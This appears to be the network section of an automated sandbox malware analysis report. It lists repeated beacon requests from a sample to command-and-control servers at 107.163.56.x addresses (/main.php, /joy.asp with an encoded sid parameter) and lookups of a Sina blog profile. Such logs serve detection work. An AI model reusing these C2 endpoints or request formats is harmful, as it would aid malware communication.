Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003F41 InternetReadFile,4_2_10003F41
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ HTTP/1.1User-Agent: Mozilla/4.0 (compatible)Host: 107.163.56.231:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u1129.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.110:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
